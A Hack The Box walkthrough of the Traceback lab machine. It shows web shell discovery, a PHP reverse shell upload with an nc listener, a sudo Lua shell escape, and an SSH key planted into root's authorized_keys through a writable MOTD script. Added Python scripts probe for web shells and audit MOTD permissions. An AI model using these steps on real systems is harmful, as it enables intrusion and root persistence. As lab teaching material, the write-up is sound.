Redhalo

Hack The Box walkthrough – Traceback machine

Here we go again today with a new HTB walkthrough: Traceback, an easy Linux machine!

Let's jump in!

Enumeration

My nmap scan (run through nmapAutomator) gave the following output:

[email protected]:~/Documents/nmapAutomator$ ./nmapAutomator.sh 10.129.1.189 Full
Running a Full scan on 10.129.1.189
Host is likely running Linux
---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-30 08:39 EST
Initiating Parallel DNS resolution of 1 host. at 08:39
Completed Parallel DNS resolution of 1 host. at 08:39, 0.01s elapsed
Initiating Connect Scan at 08:39
Scanning 10.129.1.189 [65535 ports]
Discovered open port 80/tcp on 10.129.1.189
Discovered open port 22/tcp on 10.129.1.189
Warning: 10.129.1.189 giving up on port because retransmission cap hit (1).
Connect Scan Timing: About 22.93% done; ETC: 08:41 (0:01:44 remaining)
Connect Scan Timing: About 44.95% done; ETC: 08:41 (0:01:15 remaining)
Connect Scan Timing: About 67.50% done; ETC: 08:41 (0:00:44 remaining)
Completed Connect Scan at 08:41, 136.79s elapsed (65535 total ports)
Nmap scan report for 10.129.1.189
Host is up (0.025s latency).
Not shown: 64757 closed ports, 776 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 136.88 seconds
Making a script scan on all ports

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-30 08:41 EST
Nmap scan report for 10.129.1.189
Host is up (0.025s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.04 seconds

---------------------Finished all Nmap scans---------------------
                                                                                                                                                                                                                                           
Completed in 2 minute(s) and 25 second(s)

On port 80 I found the following odd web page:

The page source contained a hint:

<!--Some of the best web shells that you might need ;)-->

A quick OSINT search led me to the following GitHub repository with a list of web shells: https://github.com/TheBinitGhimire/Web-Shells

I requested each listed web shell by name, one by one, and found that smevk.php exists on the server:

smevk's default credentials (admin/admin) let me in.
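The check-each-name step above, written out as a small script (an added example, not part of the original walkthrough, the web shell repository or any HTB material): given a base URL and a list of candidate filenames it reports which ones the server actually serves. The candidate list and the baseline filename are constructed for this example (smevk.php is the only name the page confirms), and the fetch function is injectable so the logic can be exercised offline.

```python
import sys
import urllib.error
import urllib.request

# Constructed candidate list. smevk.php is the one that exists on Traceback;
# the other names are common web shell filenames added for illustration and
# are not claimed to be the repository's exact list.
CANDIDATE_SHELLS = [
    "smevk.php", "c99.php", "r57.php", "b374k.php", "wso.php", "alfa.php",
]

# A name that should never exist; used to detect catch-all 200 responses.
BASELINE_NAME = "zz-definitely-not-here-4f1a9c.php"


def http_status(url, timeout=5):
    """GET url and return the HTTP status code (None if unreachable)."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code            # 403, 404, 500 ... still informative
    except (urllib.error.URLError, OSError):
        return None


def probe_webshells(base_url, names=CANDIDATE_SHELLS, fetch=http_status):
    """Request each candidate filename under base_url.

    Returns [(name, status)] for names that answer 200, 401 or 403 (present,
    or present but protected). If the server also answers 200 for the
    baseline name it has a catch-all page, and 200 hits are discarded as
    meaningless. fetch is injectable so the logic can be tested offline.
    """
    base = base_url.rstrip("/")
    catch_all = fetch(f"{base}/{BASELINE_NAME}") == 200
    found = []
    for name in names:
        status = fetch(f"{base}/{name}")
        if status == 200 and catch_all:
            continue
        if status in (200, 401, 403):
            found.append((name, status))
    return found


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://10.129.1.189"
    for name, status in probe_webshells(target):
        print(f"[+] {name} -> HTTP {status}")
```

The baseline request matters: a server that answers 200 to everything would otherwise make every name on the list look present.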

Foothold

Through smevk's upload feature I uploaded the php-reverse-shell.php that ships with Kali Linux in /usr/share/webshells/php/ to get a reverse shell.

Don't forget to set the $ip and $port variables in that file to your own IP address and listening port, and to start a listener (for example nc -lvnp <port>) before requesting the uploaded file:

webadmin@traceback:/home/webadmin$ whoami && id
webadmin
uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)

I am in!

Lateral Movement

In webadmin's home folder I found a file note.txt containing the following:

webadmin@traceback:/home/webadmin$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
webadmin@traceback:/home/webadmin$ 

Looking at sudo -l, I got the following output:

webadmin@traceback:/home/webadmin$ sudo -l
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
webadmin@traceback:/home/webadmin$ 

The goal is to spawn a shell as sysadmin. luvit is a Lua runtime, and sudo lets me run it as sysadmin with any script I choose, so I created a Lua file with the following content:

webadmin@traceback:/home/webadmin$ cat privesc.lua 
os.execute("/bin/sh")

Then I ran it through sudo:

webadmin@traceback:/home/webadmin$ sudo -u sysadmin /home/sysadmin/luvit privesc.lua 
$ whoami && id
sysadmin
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
$ 

Privilege Escalation

A linpeas scan showed a potential escalation vector:

/etc/update-motd.d is the folder containing the scripts that generate the Message Of The Day shown when you log in, for example over SSH. On Ubuntu these scripts are executed by pam_motd as root during the login session, so whoever can modify them gets code execution as root at the next login.

And it seems sysadmin has write permission on them. So I can use this to add my SSH public key to root's authorized_keys file.

First of all I need SSH access as sysadmin, since an SSH login is what triggers the MOTD scripts:

[email protected]:~/Documents$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:fHyPIzh7o1WdlFcPmJav3hY8X56oFttw+m3e11GgC5E [email protected]
The key's randomart image is:
+---[RSA 3072]----+
|           . +. .|
|          E = .oo|
|           o oo.o|
|       . .. .o.o.|
|        S o.o+o .|
|         o =o++..|
|        o o.X.o==|
|         +o=.++o*|
|        oo.oooooo|
+----[SHA256]-----+
[email protected]:~/Documents$ cat /home/kali/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDXM3x2sl3A/kyQoBJsbMV7R4qSZwcMrXdDpwkyb3jSTCfSvJbNlo+/WCgF8z5oYyTWIShKNXjJqs9PEbdk42Qob0HtYaXtDvcpC3OAqm57/5iT31GvV0+uAQanaxYFGK6QMw4Gti2Oxf5QAZjA/C5LIH8Ivq4+VJuy1gbUoiYZjR+VQi+akjnmPc+XiC6bYFNVef2w3yDTC5urfJuHwqXZiP0EzChtYZHqT5/3/s+3/Bs5EGfEgVdkMkna3U9sAyjBXOOJ82l2/PQzWEML32B+pI7AbUIeI+Q/uUxR8WgnBo96GwEe1Uihi/yPd0H33gBxXovhYh9qsJOA22SGDJfyLthlZJ3S8AVLbGdWtV80ckD18QGZzS+zBhuUjK2w1bQAclV3Gz1MubEjWDFjn4bgADw/qvzucvO7Fgt532D4jW3J35TBb6G//PsK8kuUcqB15aIRvAWhB4bKLqx+USJKw3rGQPC1hDO5178UaZsfAE6c1Qc5v1AuuwGNEmijvdU= [email protected]

I add my public key to sysadmin's authorized_keys:

echo "ssh-rsa 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 [email protected]" >> /home/sysadmin/.ssh/authorized_keys

I test the connection:

[email protected]:~/Documents$ ssh -i /home/kali/.ssh/id_rsa sysadmin@10.129.1.189
The authenticity of host '10.129.1.189 (10.129.1.189)' can't be established.
ECDSA key fingerprint is SHA256:7PFVHQKwaybxzyT2EcuSpJvyQcAASWY9E/TlxoqxInU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.1.189' (ECDSA) to the list of known hosts.
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################
Enter passphrase for key '/home/kali/.ssh/id_rsa': 

Welcome to Xh4H land 

Last login: Mon Mar 16 03:50:24 2020 from 10.10.14.2

That works. Now I edit /etc/update-motd.d/00-header as follows (the appended echo line is what adds my key to root's authorized_keys):

cat 00-header
#!/bin/sh
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland 
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release


echo "\nWelcome to Xh4H land \n"
echo ssh-rsa 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 [email protected] >> /root/.ssh/authorized_keys

I connect first as sysadmin, which triggers the MOTD script and plants the key, and then as root.

[email protected]:~/.ssh$ ssh -i id_rsa sysadmin@10.129.1.189
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################
Enter passphrase for key 'id_rsa': 

Welcome to Xh4H land 



Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sat Jan 30 08:10:49 2021 from 10.10.14.40
$ exit
Connection to 10.129.1.189 closed.
[email protected]:~/.ssh$ ssh -i id_rsa root@10.129.1.189
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################
Enter passphrase for key 'id_rsa': 

Welcome to Xh4H land 

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Fri Jan 24 03:43:29 2020
root@traceback:~# id
uid=0(root) gid=0(root) groups=0(root)

And I am root! My public SSH key was copied into root's authorized_keys by the MOTD script, as planned.
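As a defender's counterpart to this escalation (an added example, not part of the original walkthrough or of any HTB material): a short audit that flags MOTD scripts a non-root user could modify, which is exactly the condition sysadmin exploited here. The demo() function builds a constructed temporary directory with one group-writable script and one correctly permissioned script, so the check can be run on a box that is not misconfigured; against a real system you would call check_motd_scripts() with its defaults.

```python
import os
import stat
import tempfile

MOTD_DIR = "/etc/update-motd.d"


def check_motd_scripts(directory=MOTD_DIR, trusted_uid=0):
    """Audit the MOTD script directory.

    Returns a list of (path, [reasons]) for the directory itself and every
    entry in it that a non-root user could tamper with: not owned by
    trusted_uid, group- or world-writable, or a symlink (whose target may
    live somewhere writable). A clean directory yields an empty list.
    The directory is included because write access to it allows replacing
    the scripts outright, even when each script is itself read-only.
    """
    findings = []
    paths = [directory] + sorted(
        os.path.join(directory, name) for name in os.listdir(directory))
    for path in paths:
        st = os.lstat(path)          # lstat: do not follow symlinks
        reasons = []
        if st.st_uid != trusted_uid:
            reasons.append(f"owned by uid {st.st_uid}, not uid {trusted_uid}")
        if st.st_mode & stat.S_IWGRP:
            reasons.append("group-writable")
        if st.st_mode & stat.S_IWOTH:
            reasons.append("world-writable")
        if stat.S_ISLNK(st.st_mode):
            reasons.append("symlink")
        if reasons:
            findings.append((path, reasons))
    return findings


def demo():
    """Constructed sample: a throw-away directory shaped like
    /etc/update-motd.d with one group-writable script (the Traceback
    situation) and one correctly permissioned script. trusted_uid is set to
    the current user so that only the permission bits are judged."""
    d = tempfile.mkdtemp(prefix="motd-audit-")
    os.chmod(d, 0o755)
    weak = os.path.join(d, "00-header")
    good = os.path.join(d, "10-help-text")
    for path, mode in ((weak, 0o664), (good, 0o644)):
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return check_motd_scripts(d, trusted_uid=os.getuid())


if __name__ == "__main__":
    results = check_motd_scripts() if os.path.isdir(MOTD_DIR) else demo()
    for path, reasons in results:
        print(f"[!] {path}: {', '.join(reasons)}")
    if not results:
        print("[+] no writable MOTD scripts found")
```

Group-writable is reported even when the owning group is root's, because on Traceback the whole problem was a non-root user sitting in the group that owns the scripts; decide per finding whether the group membership is acceptable.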

EXTRA

Looking at the official HTB write-up I learnt that I could have used pspy (https://github.com/DominicBreuker/pspy) to spot that a process was running every 30 seconds to restore the MOTD scripts from a backup copy:

/bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/

The practical consequence is that the edited 00-header is overwritten shortly after you change it, so the SSH login that triggers it has to happen within that window; if root's authorized_keys did not get your key, re-apply the edit and log in straight away.